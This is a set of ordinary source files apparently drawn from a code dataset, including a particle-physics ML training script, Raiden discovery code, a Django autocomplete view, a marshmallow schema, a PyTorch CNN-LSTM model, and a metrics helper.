bdt = Bdt(mlData, 'testPlots/mlPlots/' + varSetName + '/bdtGridSearch')\n bdt.setup()\n bdt.gridSearch(param_grid=bdtGridParams, kfolds=3, n_jobs=4)\n\n elif not doRegression:\n # Start with a BDT from sklearn (a la TMVA)\n print('Defining and fitting BDT')\n bdt = Bdt(mlData, 'testPlots/mlPlots/' + varSetName + '/bdt')\n bdt.setup()\n bdt.fit()\n if doCrossVal:\n print(' > Carrying out cross validation')\n bdt.crossValidation(kfolds=5)\n if makeLearningCurve:\n print(' > Making learning curves')\n bdt.learningCurve(kfolds=5, n_jobs=3)\n\n # and carry out a diagnostic of the results\n print(' > Producing diagnostics')\n bdt.diagnostics()\n\n trainedModels[varSetName + '_bdt'] = bdt\n\n if doDNN:\n\n if doGridSearch:\n print('Running DNN grid search')\n dnn = Dnn(data=mlData, output='testPlots/mlPlots/' + varSetName + '/dnnGridSearch')\n dnn.setup()\n dnn.gridSearch(param_grid=dnnGridParams, kfolds=3, epochs=20, batch_size=32, n_jobs=4)\n\n if doRegression:\n\n for name, config in dnnConfigs.iteritems():\n\n for regressionVar in regressionVars:\n\n if regressionVar not in varSet: continue\n\n # Drop unconverged events for MT2\n if regressionVar == 'MT2W':\n toRunRegression = combinedToRun[combinedToRun.MT2W != 999.0]\n else:\n toRunRegression = combinedToRun\n\n mlDataRegression = MlData(toRunRegression.drop('signal', axis=1), regressionVar)\n mlDataRegression.prepare(evalSize=0.0, testSize=0.2, limitSize=limitSize, standardise=False)\n\n print('Defining and fitting DNN', name, 'Regression', regressionVar)\n dnn = Dnn(mlDataRegression, 'testPlots/mlPlots/regression/' + varSetName + '/' + name,\n doRegression=True)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n\n if makeLearningCurve:\n print(' > Making learning curves')\n dnn.learningCurve(kfolds=3, n_jobs=1, scoring='neg_mean_squared_error')\n\n print(' > Producing diagnostics')\n dnn.diagnostics()\n\n\n else:\n # Now let's move on to a deep neural net\n for name, config in dnnConfigs.iteritems():\n\n if normalLoss:\n print('Defining and fitting DNN', name)\n output_path = \"testPlots/mlPlots/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(data=mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'],\n dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n
falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n if doCrossVal:\n print(' > Carrying out cross validation')\n dnn.crossValidation(kfolds=5, epochs=config['epochs'], batch_size=config['batch_size'])\n if makeLearningCurve:\n print(' > Making learning curves')\n dnn.learningCurve(kfolds=5, n_jobs=1)\n\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=False)\n\n trainedModels[varSetName + '_' + name] = dnn\n\n if sigLoss:\n print('Defining and fitting DNN with significance loss function', name)\n output_path = \"testPlots/mlPlots/sigLoss/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(data=mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=significanceLoss(expectedSignal, expectedBkgd),\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=True)\n trainedModels[varSetName + '_sigLoss_' + name] = dnn\n\n if sigLossInvert:\n print('Defining and fitting DNN with significance loss function', name)\n output_path = \"testPlots/mlPlots/sigLossInvert/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(mlData, 'testPlots/mlPlots/sigLossInvert/' + varSetName + '/' + name)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=significanceLossInvert(expectedSignal, expectedBkgd),\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=True)\n trainedModels[varSetName + '_sigLossInvert_' + name] = dnn\n\n if asimovSigLossInvert:\n print('Defining and fitting DNN with significance loss function', name)\n output_path = \"testPlots/mlPlots/asimovSigLossInvert/{0}/{1}/{2}\".format(varSetName, name,\n VORNAME)\n dnn = Dnn(mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=asimovSignificanceLossInvert(expectedSignal, expectedBkgd, systematic),\n extraMetrics=[\n significanceLoss(expectedSignal, expectedBkgd),\n significanceFull(expectedSignal, expectedBkgd),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic), truePositive,\n falsePositive\n ])\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=False)\n\n trainedModels[varSetName + '_asimovSigLossInvert_' + name] = dnn\n\n if asimovSigLoss:\n print('Defining and fitting DNN with asimov significance loss function', name)\n output_path = 
\"testPlots/mlPlots/asimovSigLoss/{0}/{1}/{2}\".format(varSetName, name, VORNAME)\n dnn = Dnn(mlData, output=output_path)\n dnn.setup(hiddenLayers=config['hiddenLayers'], dropOut=config['dropOut'],\n l2Regularization=config['l2Regularization'],\n loss=asimovSignificanceLoss(expectedSignal, expectedBkgd, systematic),\n extraMetrics=[\n asimovSignificanceLoss(expectedSignal, expectedBkgd, systematic),\n asimovSignificanceFull(expectedSignal, expectedBkgd, systematic),\n significanceFull(expectedSignal, expectedBkgd), truePositive, falsePositive\n ])\n\n dnn.fit(epochs=config['epochs'], batch_size=config['batch_size'])\n dnn.save()\n print(' > Producing diagnostics')\n dnn.diagnostics(batchSize=8192)\n dnn.makeHepPlots(expectedSignal, expectedBkgd, systematic, makeHistograms=False)\n\n trainedModels[varSetName + '_asimovSigLoss_' + name] = dnn\n\n pass\n\n pass # end of variable set loop\n\n # Compare all the results\n if not doGridSearch and not doRegression:\n # Now compare all the different versions\n compareMl = ComparePerformances(trainedModels, output='testPlots/mlPlots/comparisons')\n\n compareMl.compareRoc(append='_all')\n compareMl.rankMethods()\n\n compareMl.compareRoc(['gram_dnn', 'gram_dnn3l_2p0n_do0p25', 'gram_dnn5l_1p0n_do0p25', 'gram_dnn4l_2p0n_do0p25'],\n append='_gramOnly')\n compareMl.compareRoc(['fourVector_dnn', 'fourVector_dnn3l_2p0n_do0p25', 'fourVector_dnn5l_1p0n_do0p25',\n 'fourVector_dnn4l_2p0n_do0p25'], append='_fourVectorOnly')\n compareMl.compareRoc(['fourVector_dnn', 'fourVector_dnn3l_2p0n_do0p25', 'fourVector_dnn5l_1p0n_do0p25',\n 'fourVector_dnn4l_2p0n_do0p25'], append='_fourVectorOnly')\n\n # #compareMl.compareRoc(['gram_dnn2l','gramMT_dnn2l','gramHT_dnn2l','gramMT2W_dnn2l','gramBL_dnn2l'],append='_gramOnlyDNN2l')\n # compareMl.compareRoc(['gram_dnn2ldo0p2','gramMT_dnn2ldo0p2','gramHT_dnn2ldo0p2','gramMT2W_dnn2ldo0p2','gramBL_dnn2ldo0p2'],append='_gramOnlyDNN2ldo0p2')\n # compareMl.compareRoc(['gram_dnn3ldo0p2','gramMT_dnn3ldo0p2','gramHT_dnn3ldo0p2','gramMT2W_dnn3ldo0p2','gramBL_dnn3ldo0p2'],append='_gramOnlyDNN3ldo0p2')\n # compareMl.compareRoc(['gram_bdt','gramMT_bdt','gramHT_bdt','gramMT2W_bdt','gramBL_bdt'], append='_gramOnlyBDT')\n #\n # compareMl.compareRoc(['fourVector_dnn','fourVectorMT_dnn','fourVectorHT_dnn','fourVectorMT2W_dnn','fourVectorBL_dnn'],append='_fourVectorOnlyDNN')\n # #compareMl.compareRoc(['fourVector_dnn2l','fourVectorMT_dnn2l','fourVectorHT_dnn2l','fourVectorMT2W_dnn2l','fourVectorBL_dnn2l'],append='_fourVectorOnlyDNN2l')\n # compareMl.compareRoc(['fourVector_dnn2ldo0p2','fourVectorMT_dnn2ldo0p2','fourVectorHT_dnn2ldo0p2','fourVectorMT2W_dnn2ldo0p2','fourVectorBL_dnn2ldo0p2'],append='_fourVectorOnlyDNN2ldo0p2')\n # compareMl.compareRoc(['fourVector_dnn3ldo0p2','fourVectorMT_dnn3ldo0p2','fourVectorHT_dnn3ldo0p2','fourVectorMT2W_dnn3ldo0p2','fourVectorBL_dnn3ldo0p2'],append='_fourVectorOnlyDNN3ldo0p2')\n # compareMl.compareRoc(['fourVector_bdt','fourVectorMT_bdt','fourVectorHT_bdt','fourVectorMT2W_bdt','fourVectorBL_bdt'], append='_fourVectorOnlyBDT')\n #\n compareMl.compareRoc(['gram_dnn5l_1p0n_do0p25', 'gram_bdt',\n 'fourVector_dnn3l_2p0n_do0p25', 'fourVector_bdt',\n 'vanilla_dnn3l_2p0n_do0p25', 'vanilla_dnn5l_1p0n_do0p25', 'vanilla_bdt'],\n append='_vanillaComparisons')\n #\n\n # DNN study\n # compareMl = ComparePerformances(trainedModels,output='testPlots/mlPlots/dnnStudy')\n compareMl.compareRoc(append='_all')\n # compareMl.rankMethods()\n # #BDT study\n # compareMl = 
ComparePerformances(trainedModels,output='testPlots/mlPlots/bdtStudy')\n # compareMl.compareRoc(append='_all')\n # compareMl.rankMethods()\n\n pass\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":30071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"400950179","text":"#coding=utf-8\n#import libs\nimport GameFun \nimport Scene2\n\nclass GameUI(GameFun.Label):\n def __init__(self):\n super(GameUI, self).__init__()\n self.SetWidth(480)\n self.SetHeight(640)\n self.label_2 = GameFun.Label(self,52,170,\"\",\"Arial\",16)\n self.label_2.SetWidth(310)\n self.label_2.SetHeight(99)\n self.label_2.SetImage(\"ui\",\"title.png\",False)\n self.button_3 = GameFun.Button(self,150,366)\n self.button_3.SetWidth(162)\n self.button_3.SetHeight(50)\n self.button_3.SetImage(\"ui\",\"restart1.png\")\n self.button_3.SetPickUpFunction(self.button_3_PickUp)\n self.button_4 = GameFun.Button(self,153,453)\n self.button_4.SetWidth(159)\n self.button_4.SetHeight(45)\n self.button_4.SetImage(\"ui\",\"exit1.png\")\n self.button_4.SetPickUpFunction(self.button_4_PickUp)\n def OnLoad(self,sceneInstance):\n super(GameUI, self).OnLoad(sceneInstance)\n def button_3_PickUp(self,uiNode):\n sceneInstance = uiNode.GetSceneInstance()\n uiLayer1 = sceneInstance.GetLayer(\"UI\")\n uiLayer1.SetVisible(False)\n scene2 = Scene2.Scene()\n GameFun.gameAppInstance.SetCurrentScene(scene2)\n GameFun.gameAppInstance.SetBindingVar(\"KillCount\",0)\n def button_4_PickUp(self,uiNode):\n GameFun.gameAppInstance.exit() ","sub_path":"Examples/AircraftWar/StartGameUI.py","file_name":"StartGameUI.py","file_ext":"py","file_size_in_byte":1356,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"432193864","text":"# -*- coding: utf-8 -*-\nimport socket\n\nfrom ethereum import slogging\n\nfrom raiden.exceptions import UnknownAddress\nfrom raiden.utils import (\n host_port_to_endpoint,\n isaddress,\n pex,\n split_endpoint,\n)\nfrom raiden.exceptions import InvalidAddress\n\nlog = slogging.getLogger(__name__)\n\n\nclass Discovery(object):\n \"\"\" Mock mapping address: host, port \"\"\"\n\n def __init__(self):\n self.nodeid_to_hostport = dict()\n\n def register(self, node_address, host, port):\n if not isaddress(node_address):\n raise ValueError('node_address must be a valid address')\n\n try:\n socket.inet_pton(socket.AF_INET, host)\n except OSError:\n raise ValueError('invalid ip address provided: {}'.format(host))\n\n if not isinstance(port, (int, long)):\n raise ValueError('port must be a valid number')\n\n self.nodeid_to_hostport[node_address] = (host, port)\n\n def get(self, node_address):\n try:\n return self.nodeid_to_hostport[node_address]\n except KeyError:\n raise InvalidAddress('Unknown address {}'.format(pex(node_address)))\n\n def nodeid_by_host_port(self, host_port):\n for nodeid, value_hostport in self.nodeid_to_hostport.items():\n if value_hostport == host_port:\n return nodeid\n return None\n\n\nclass ContractDiscovery(Discovery):\n \"\"\" Raiden node discovery.\n\n Allows registering and looking up by endpoint (host, port) for node_address.\n \"\"\"\n\n def __init__(self, node_address, discovery_proxy):\n super(ContractDiscovery, self).__init__()\n\n self.node_address = node_address\n self.discovery_proxy = discovery_proxy\n\n def register(self, node_address, host, port):\n if node_address != self.node_address:\n raise ValueError('You can only register your own endpoint.')\n\n if not 
isaddress(node_address):\n raise ValueError('node_address must be a valid address')\n\n try:\n socket.inet_pton(socket.AF_INET, host)\n except OSError:\n raise ValueError('invalid ip address provided: {}'.format(host))\n\n if not isinstance(port, (int, long)):\n raise ValueError('port must be a valid number')\n\n try:\n current_value = self.get(node_address)\n except UnknownAddress:\n current_value = None\n\n if current_value == (host, port):\n log.info(\n 'endpoint already registered',\n node_address=pex(node_address),\n host=host,\n port=port\n )\n else:\n endpoint = host_port_to_endpoint(host, port)\n self.discovery_proxy.register_endpoint(node_address, endpoint)\n log.info(\n 'registered endpoint in discovery',\n node_address=pex(node_address),\n host=host,\n port=port\n )\n\n def get(self, node_address):\n endpoint = self.discovery_proxy.endpoint_by_address(node_address)\n host_port = split_endpoint(endpoint)\n return host_port\n\n def nodeid_by_host_port(self, host_port):\n host, port = host_port\n endpoint = host_port_to_endpoint(host, port)\n return self.discovery_proxy.address_by_endpoint(endpoint)\n\n def version(self):\n return self.discovery_proxy.version()\n","sub_path":"raiden/network/discovery.py","file_name":"discovery.py","file_ext":"py","file_size_in_byte":3394,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"422861231","text":"import json\nimport logging\n\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.db.models import Sum\nfrom django.http import HttpResponse\n\nfrom apps.ventas.models.Producto import Producto\nfrom ..models.cliente import Cliente\nfrom ..models.mascota import Mascota\n\nlog = logging.getLogger(__name__)\n\n\ndef BuscarProducto(request):\n if request.is_ajax():\n q = request.GET.get('term', '')\n results = []\n productos = Producto.objects.filter(\n nombre__icontains=q).annotate(\n stock=Sum('almacen__existencia'))\n for producto in productos[:5]:\n producto_json = {}\n producto_json['id'] = producto.id\n producto_json['label'] = producto.nombre\n producto_json['value'] = producto.nombre\n producto_json['nombre'] = producto.nombre\n producto_json['precioV'] = producto.precioV\n producto_json['existencia'] = producto.stock\n # compras\n producto_json['precioC'] = producto.precioC\n producto_json['unidad_medida'] = producto.unidad_medida.nombre\n producto_json[\n 'unidad_medida_nombre'] = producto.unidad_medida.cant_equivalencia\n # producto_json['igv'] = producto.igv\n results.append(producto_json)\n data = json.dumps(results, cls=DjangoJSONEncoder)\n else:\n data = 'No se puede obtener datos'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n\n\ndef get_drugs(request):\n if request.is_ajax():\n q = request.GET.get('term', '')\n\n results = []\n drugs = Mascota.objects.filter(\n duenho__persona__first_name__contains=q)[:20]\n print(\"IMprimeido los drugs\", drugs)\n if drugs:\n print(\"holaaaaaaaaaaaaaaaaaaa\")\n drugs = Mascota.objects.filter(\n duenho__persona__first_name__contains=q)[:20]\n\n results = []\n for drug in drugs:\n drug_json = {}\n drug_json['id'] = drug.id\n drug_json['nombre_mascota'] = drug.nombre\n drug_json['label'] = drug.duenho.persona.first_name + \\\n ' ' + drug.nombre\n drug_json['value'] = drug.duenho.persona.first_name\n drug_json['cliente_id'] = drug.duenho.id\n\n # drug_json['pk'] = serializers.serialize('json', drug.mascotas.all(), fields=('id','nombre'))\n # drug_json['mascota_atencion'] = drug.nombre\n 
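# Each suggestion pairs the owner's first name with the pet's name to form the label shown in the autocomplete\n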
results.append(drug_json)\n print(results)\n if not drugs:\n print(\"fgggggggggggggggggggg\")\n drugs = Cliente.objects.filter(\n persona__first_name__contains=q)[:20]\n results = []\n for drug in drugs:\n drug_json = {}\n drug_json['cliente_id'] = drug.id\n drug_json['label'] = drug.persona.first_name\n drug_json['value'] = drug.persona.first_name\n # drug_json['pk'] = serializers.serialize('json', drug.mascotas.all(), fields=('id','nombre'))\n # drug_json['mascota_atencion'] = drug.nombre\n results.append(drug_json)\n print(results)\n data = json.dumps(results)\n else:\n data = 'No se puede obtener datos'\n mimetype = 'application/json'\n return HttpResponse(data, mimetype)\n","sub_path":"apps/clinica/views/vacunacionviews.py","file_name":"vacunacionviews.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"277277270","text":"from .baseschema import ma\nfrom src.models.learning_stream import LearningStream, LearningStreamLearningPractices, LearningStreamTags\nfrom marshmallow import fields, post_dump, pre_load\nfrom src.database.utils.crud import read_rows\nfrom nltk.tokenize import TweetTokenizer\nfrom src.database.db import get_db_session\nimport re\nimport string \nclass LearningStreamSchema(ma.ModelSchema):\n learningStreamTags = fields.Nested('LearningStreamTagsSchema',\n many = True,\n exclude = ('learningStream', 'learningStreamId'),\n dump_only = True)\n tags = fields.Nested('TagSchema',\n many = True,\n exclude = ('episodeTags', 'episodes',\n 'learningPointTags', 'learningPoints',\n 'learningPracticeTags', 'learningPractices',\n 'learningStreamTags', 'learningStreams'))\n learningStreamLearningPractices = fields.Nested( 'LearningStreamLearningPracticesSchema',\n many = True,\n exclude = ('learningStream', 'learningStreamId'),\n dump_only = True\n )\n learningPractices = fields.Nested('LearningStreamLearningPracticesSchema',\n many = True,\n exclude = ('learningStreamLearningPractices' , 'LearningStreams'))\n class Meta:\n model = LearningStream\n init_session, _ = get_db_session()\n sqla_session = init_session\n href = ma.Hyperlinks(\n {\n 'self': [\n ma.URLFor('apiV1_0.learning_streams_id', id = ''),\n ma.URLFor('apiV1_0.learning_streams_slug', slug = '')\n ],\n 'collection': ma.URLFor('apiV1_0.learning_streams')\n }\n )\n @pre_load\n def check_data(self, data):\n if data.get('id') is None:\n if data.get('name') is None:\n raise ValueError('Must Include name')\n punct = set(string.punctuation)\n #if both the id and the slug is none then this is a completely new blog\n #generate the slug from the title by tokenizing the lowered title and filtering for only alphanumeric characters\n #then use the join method on the filtered slug tokens to form a slug_like_this from ['slug','like','this']\n slug_array = TweetTokenizer().tokenize(data['name'].lower())\n if len(slug_array) == 1:\n data['slug'] = slug_array[0]\n else:\n slug_array = list(filter(lambda x: not re.match(\"(\\\\d|\\\\W)+\", x) and not x in punct, slug_array))\n data['slug'] = '_'.join(slug_array)\n query = read_rows(LearningStream, filters= [\n {\n 'slug': {\n 'comparitor': '==',\n 'data': data['slug']\n }\n }\n ]).one_or_none()\n count = 1\n #loop over until you find a unique slug by appending an incrementing count to the end of the slug\n while query is not None:\n slug = data['slug'] + '_' + str(count)\n query = read_rows(LearningStream, filters= [\n {\n 'slug': {\n 'comparitor': '==',\n 'data': slug\n }\n }\n 
]).one_or_none()\n data['slug'] = slug\n count += 1\n else:\n for key in list(data.keys()):\n if key != 'id':\n del data[key]\n @post_dump\n def clean_up(self,data):\n if data.get('learningStreamLearningPractices') is not None:\n data['learningPractices'] = data['learningStreamLearningPractices']\n del data['learningStreamLearningPractices']\n if data.get('learningStreamTags'):\n data['tags'] = data['learningStreamTags']\n del data['learningStreamTags']\n\nclass LearningStreamTagsSchema(ma.ModelSchema):\n learningStream = fields.Nested('LearningStreamSchema',\n exclude = ('learningStreamTags', 'tags',\n 'learningStreamLearningPractices', 'learningPractices') )\n tag = fields.Nested('TagSchema', \n exclude = ('learningPoints', 'learningPointTags', \n 'episodes', 'episodeTags', \n 'learningPracticesTags', 'learningPractices',\n 'learningStreamTags', 'learningStreams'))\n class Meta:\n model = LearningStreamTags\nclass LearningStreamLearningPracticesSchema(ma.ModelSchema):\n learningPractice = fields.Nested('LearningPracticeSchema',\n exclude = ('learningStreams', 'learningStreamLearningPractices'))\n learningStream = fields.Nested('LearningStreamSchema',\n exclude= ('learningPractices', 'learningStreamLearningPractices')\n )\n class Meta:\n model = LearningStreamLearningPractices\n\n","sub_path":"src/utils/marshmallow/learning_stream_schema.py","file_name":"learning_stream_schema.py","file_ext":"py","file_size_in_byte":4793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"421884964","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n# Model based on CellNuclei.ipynb reference [1]\n\nclass RNNet(nn.Module):\n def __init__(self):\n super().__init__()\n # (Batch_size, hidden_size = 3, seq_len = 196)\n batch_size = 64\n pad11 = samePad(5, 1)\n self.conv11 = nn.Conv1d(in_channels = 3, out_channels = 48, kernel_size = 5, padding = pad11)\n nn.init.kaiming_normal_(self.conv11.weight)\n # (Batch_size, 48, 196)\n pad21 = samePad(5, 1)\n self.conv21 = nn.Conv1d(in_channels = 48, out_channels = 64, kernel_size = 5, padding = pad21)\n nn.init.kaiming_normal_(self.conv21.weight)\n# (Batch_size, 64, 196)\n pad31 = samePad(3, 1)\n self.conv31 = nn.Conv1d(in_channels = 64, out_channels = 96, kernel_size = 3, padding = pad31)\n nn.init.kaiming_normal_(self.conv31.weight)\n #(Batch_size, 96, 196)\n self.lstm41 = nn.LSTM(input_size= 96, hidden_size = 48, dropout = 0.0, bidirectional = True)\n\n self.lstm51 = nn.LSTM(input_size = 96, hidden_size = 48, dropout = 0.0, bidirectional = True)\n\n self.forward61 = nn.Linear(18816, batch_size)\n nn.init.kaiming_normal_(self.forward61.weight)\n\n self.forward71 = nn.Linear(batch_size, 5)\n nn.init.kaiming_normal_(self.forward71.weight)\n\n\n def forward(self, x):\n batch_size = 64\n x1 = self.conv11(x)\n x2 = self.conv21(F.tanh(x1))\n x3 = self.conv31(F.tanh(x2))\n\n # Turn (batch_size x hidden_size x seq_len) back into (seq_len x batch_size x hidden_size) for RNN\n x_rnn = x3.transpose(1, 2).transpose(0, 1)\n\n output4, (x4_hidden, x4_cell) = self.lstm41(x_rnn)\n output5, (x5_hidden, x5_cell) = self.lstm51(output4, (x4_hidden, x4_cell))\n\n seq_len, batch, out = output5.size()\n out_transpose = output5.transpose(1, 2)\n\n out_same = out_transpose.contiguous()\n x_forward = out_same.view(seq_len*out, batch)\n x_f = x_forward.transpose(0, 1)\n\n x6 = self.forward61(x_f)\n x7 = self.forward71(F.tanh(x6))\n\n x_out = F.softmax(x7)\n\n return x_out\n\ndef samePad(filterSize, stride):\n 
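    # With stride 1 this evaluates to (filterSize - 1) // 2, i.e. 'same' padding that keeps the Conv1d output length equal to its input length\n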
return int(float(filterSize - stride)/2)\n","sub_path":"rnn_lstm.py","file_name":"rnn_lstm.py","file_ext":"py","file_size_in_byte":2235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"289689256","text":"#!/usr/bin/env python\nimport unittest\nimport os\nimport sys\n\nscript_dir = os.path.dirname(os.path.realpath(__file__))\nsys.path.insert(0, os.path.dirname(script_dir))\nfrom snort2fortigate import test_convert\n\nclass TestSnort2Fortigate(unittest.TestCase):\n\t\t\n def testConvert(self):\t\n ifh = open(os.path.join(script_dir, 'snort_custom.rules'), 'r')\n assertfh = open(os.path.join(script_dir, 'assert_fgt.rules'), 'r')\n in_f = ifh.read().splitlines()\n assert_f = assertfh.read().splitlines()\n for i, rule in enumerate(in_f):\n result = test_convert(rule)\n self.assertEqual(result[1].rstrip(), assert_f[i].rstrip())\n\nif __name__ == '__main__':\n unittest.main()","sub_path":"test/test_snort2fortigate.py","file_name":"test_snort2fortigate.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"548127769","text":"'''\n@package: shottool\n@author: Trevor van Hoof\n'''\ntry:\n\tfrom PySide.QtCore import *\n\tfrom PySide.QtGui import *\nexcept:\n\ttry:\n\t\tfrom PyQt4.QtCore import *\n\t\tfrom PyQt4.QtGui import *\n\texcept:\n\t\traise ImportError('PyQt4 and PySide both not found, install either library to use this tool.\\n'\n'Go to http://qt-project.org/wiki/Category:LanguageBindings::PySide::Downloads and look under \"Binaries\" for your platform.')\n\nfrom maya import cmds\n\n\nclass InteractiveShotWidget(QWidget):\n\t'''\n\tShows a visualization of a given shot model.\n\tShows which shot is the currently visible shot based on the current time.\n\t'''\n\tdef __init__(self, parent, shotmodel):\n\t\t'''\n\t\t@param parent: QWidget, the parent widget.\n\t\tSince PySide is unsafe when using NULL parents this argument is required.\n\t\t@param shotmodel: ShotModel, the model to visualize.\n\t\t'''\n\t\tsuper(InteractiveShotWidget, self).__init__(parent)\n\t\tself.__model = shotmodel\n\t\tcmds.scriptJob(timeChange=self.paintEvent)\n\t\t\n\tdef paintEvent(self, event):\n\t\tif self.__model.rowCount() < 2:\n\t\t\treturn\n\t\t\n\t\tpainter = QPainter(self)\n\t\t\n\t\tfirst = int(self.__model.item(0, 1).text())\n\t\tlast = int(self.__model.item(self.__model.rowCount()-1, 2).text())\n\t\tduration = last - first + 1\n\t\t\n\t\tusedcameras = self.__model.usedCameras()\n\t\tnumrows = len(usedcameras)\n\t\t\n\t\twidth = self.geometry().width()\n\t\theight = self.geometry().height()\n\t\tystep = height / numrows\n\t\tfor i in range(self.__model.rowCount()):\n\t\t\tname = str(self.__model.item(i, 0).text())\n\t\t\tstart = int(self.__model.item(i, 1).text())\n\t\t\tend = int(self.__model.item(i, 2).text())\n\t\t\tlength = end - start + 1\n\t\t\tcamera = self.__model.getCameraPath(i)\n\t\t\t\n\t\t\tcurtime = int(cmds.currentTime(q=True))\n\t\t\tif curtime >= start and curtime <= end:\n\t\t\t\tpainter.setBrush(QColor(51, 140, 179))\n\t\t\telse:\n\t\t\t\tpainter.setBrush(QColor(51, 140, 179, 100))\n\t\t\tpainter.setPen(Qt.NoPen)\n\t\t\t\n\t\t\tarea = QRect(width * (start - first) / float(duration),\n\t\t\t\tusedcameras.index(camera) * ystep,\n\t\t\t\twidth * length / float(duration), \n\t\t\t\tystep)\n\t\t\tpainter.drawRect(area)\n\t\t\t\n\t\t\tpainter.setPen(QColor(0,0,0))\n\t\t\tpainter.drawText(area, 'Shot %s: %s'%(i, 
name))\n\t\t\n\t\tpainter.setPen(Qt.NoPen)\n\t\tpainter.setBrush(Qt.red)\n\t\tpainter.drawRect(width * (cmds.currentTime(q=True) - first) / float(duration), 0, 2, height)","sub_path":"shottool/interactiveshotwidget.py","file_name":"interactiveshotwidget.py","file_ext":"py","file_size_in_byte":2282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"492104275","text":"from server.server import *\nfrom server.pluginAPI import *\nfrom server.strings import *\n\n\nSERVER_DEFAULT_PORT = 1337\n\nclass CliServer(StringsServer):\n\tdef __init__(self, port):\n\t\tServer.__init__(self, \"0.0.0.0\", port)\n\n\ndef main():\n\tserver = CliServer(SERVER_DEFAULT_PORT)\n\tserver.serve()\n\nif __name__ == \"__main__\":\n\tmain()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"90308535","text":"from typing import List, Dict, Tuple, Callable, Iterable\n\nimport numpy as np\nimport sacrebleu\nfrom rouge_score import rouge_scorer, scoring\nfrom transformers import EvalPrediction, PreTrainedTokenizer\n\nfrom sentence_splitter import add_newline_to_end_of_each_sentence\n\n# ROUGE_KEYS = [\"rouge1\", \"rouge2\", \"rougeL\", \"rougeLsum\"]\nROUGE_KEYS = [\"rouge1\"]\n\n\ndef calculate_bleu(candidate: str, refs: List[str], **kwargs) -> dict:\n return {\"bleu\": round(sacrebleu.compat.sentence_bleu(candidate, refs, **kwargs).score / 100, 4)}\n\n\ndef calculate_rouge(\n pred_lns: List[str],\n tgt_lns: List[str],\n use_stemmer=True,\n rouge_keys=ROUGE_KEYS,\n return_precision_and_recall=False,\n bootstrap_aggregation=True,\n newline_sep=True,\n) -> Dict:\n \"\"\"Calculate rouge using rouge_scorer package.\n Args:\n pred_lns: list of summaries generated by model\n tgt_lns: list of groundtruth summaries (e.g. contents of val.target)\n use_stemmer: Bool indicating whether Porter stemmer should be used to\n strip word suffixes to improve matching.\n rouge_keys: which metrics to compute, defaults to rouge1, rouge2, rougeL, rougeLsum\n return_precision_and_recall: (False) whether to also return precision and recall.\n bootstrap_aggregation: whether to do the typical bootstrap resampling of scores. Defaults to True, if False\n this function returns a collections.defaultdict[metric: list of values for each observation for each subscore]``\n newline_sep:(default=True) whether to add newline between sentences. 
